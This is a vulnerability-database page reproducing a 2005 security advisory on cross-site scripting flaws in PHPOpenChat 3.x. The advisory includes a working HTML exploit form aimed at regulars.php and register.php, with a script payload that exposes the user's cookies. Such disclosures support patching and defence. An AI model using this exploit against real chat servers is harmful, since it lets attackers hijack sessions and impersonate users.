Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpOpenChat.txt

🗓️ 22 Mar 2005 00:00:00Reported by Pi3cHType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

PHPOpenChat v3.X has XSS vulnerabilities allowing remote cookie access and user impersonation.

Code
`  
  
[PersianHacker.NET 200503-09]PHPOpenChat v3.X XSS Multiple Vulnerability  
Date: 2005 March  
Bug Number: 09  
  
PHPOpenChat  
is a high performance php-based chat server software for a live chat-room or -module on every php-based site.  
More info @:  
http://phpopenchat.org/  
  
  
Discussion:  
--------------------  
The software does not properly validate user-supplied input in 'regulars.php', 'register.php'.  
  
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHPOpenChat software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.  
  
  
Exploit:  
--------------------  
<html>  
<head>  
<title>PHPOpenChat v3.x XSS Exploit</title>  
</head>  
<body>  
<h1>PHPOpenChat v3.x XSS Exploit</h1>  
<form method="POST" action="http://www.example.com/regulars.php">  
<b>XSS in regulars.php:</b><p>  
<input type="text" name="chatter" size="48" value="XSS Injection Code"></p>  
</p>  
<p>exmple: <script>document.write(document.cookie)</script></p>  
<p><input type="submit" style="width:80px" value="Excute" name="B1"></p>  
</form>  
<form method="POST" action="http://www.example.com/register.php">  
<b>XSS in register.php:</b><p>  
Nikname:  
<input type="text" name="chatter" size="48" value="XSS Injection Code"></p>  
<p>  
Password:  
<input type="text" name="chatter1" size="48" value="XSS Injection Code"></p>  
<p>  
FirstName LastName:  
<input type="text" name="chatter2" size="48" value="XSS Injection Code"></p>  
<p>  
Email:  
<input type="text" name="chatter3" size="48" value="XSS Injection Code"></p>  
<p>  
Url of picture:  
<input type="text" name="chatter4" size="48" value="XSS Injection Code"></p>  
</p>  
<p>exmple: <script>document.write(document.cookie)</script></p>  
<p><input type="submit" style="width:80px" value="Excute" name="B1"></p>  
</form>  
<p>&nbsp;</p>  
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>  
</body>  
</html>  
  
  
Solution:  
--------------------  
No solution was available at the time of this entry.  
  
  
Credit:  
--------------------  
Discovered by PersianHacker.NET Security Team  
by Pi3cH (pi3ch persianhacker net)  
http://www.PersianHacker.NET  
  
Special Thanks: devil_box(for xss article), amectris, herbod.  
  
  
Help  
--------------------  
visit: http://www.PersianHacker.NET  
or mail me @: pi3ch persianhacker net  
  
  
Note  
--------------------  
This vulnerability reported to authors for solution, from bug report webform.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
phpopenchat vulnerabilities remote access user impersonation cookie theft xss exploit
27